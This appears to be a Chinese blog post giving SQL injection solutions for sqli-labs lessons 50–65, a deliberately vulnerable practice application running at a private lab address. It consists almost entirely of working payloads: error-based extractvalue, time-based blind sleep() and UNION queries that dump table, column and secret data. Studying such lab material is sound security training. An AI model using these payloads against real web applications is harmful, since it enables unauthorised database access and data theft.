zoukankan      html  css  js  c++  java

  • 【20171105早】sqli-libs Less 50-65

    Less 50-65 题目类型都没有新奇的注入方式,基本上是以往类型的注入,或者是复合型注入。老黑不进行多加赘述了,多加解释,只会看低读者的智商。payload如下所示

     1 Less 50
 2 http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+
 3 Less 51
 4 http://192.168.162.135/sqli-libs/Less-51/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 5 Less 52
 6 http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 7 Less 53
 8 http://192.168.162.135/sqli-libs/Less-53/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 9 Less 54
10 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
11 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema ='challenges' and table_name='POV9ATA70T')--+
12 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+
13 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,version(),database()--+
14 Less 55
15 http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
16 Less 56
17 http://192.168.162.135/sqli-libs/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
18 Less 57
19 http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
20 Less 58
21 http://192.168.162.135/sqli-libs/Less-58/?id=-1' union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
22 Less 59:
23 http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
24 Less 60:
25 http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
26 Less 61:
27 http://192.168.162.135/sqli-libs/Less-61/?id=-1')) union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
28 Less 62:
29 http://192.168.162.135/sqli-libs/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
30 Less 63:
31 http://192.168.162.135/sqli-libs/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
32 Less 64:
33 http://192.168.162.135/sqli-libs/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
34 Less 65:
35 http://192.168.162.135/sqli-libs/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+

      
  • 相关阅读:
    SAP 移动类型 整理
    VB6及VS2005 相关的 树TREE控件,网格控件、电子表格控件、网络图及甘持图控件(项目进度)
    金蝶 PK 用友,第三方评论与自我评价(1)
    谁在开发“工作流”WORKFLOW 产品?
    协同及ERP开发平台,我们如何选择?
    关注“北京广联达软件公司”的项目成本管理系统 !
    一个免费提供的开发平台___"KCOM 商业工程"
    企业 ISO“质量、安全和环境” 三大体系认证的管理系统的开发者 !
    MAXWELL 万胜系统软件公司——为工程建设承包商提供优秀的软件套件!
    Contractor Anywhere (任何地方的承包商)也被 SAGE “赛捷”公司收购 !
  • 原文地址:https://www.cnblogs.com/heijuelou/p/7788968.html
Copyright © 2011-2022 走看看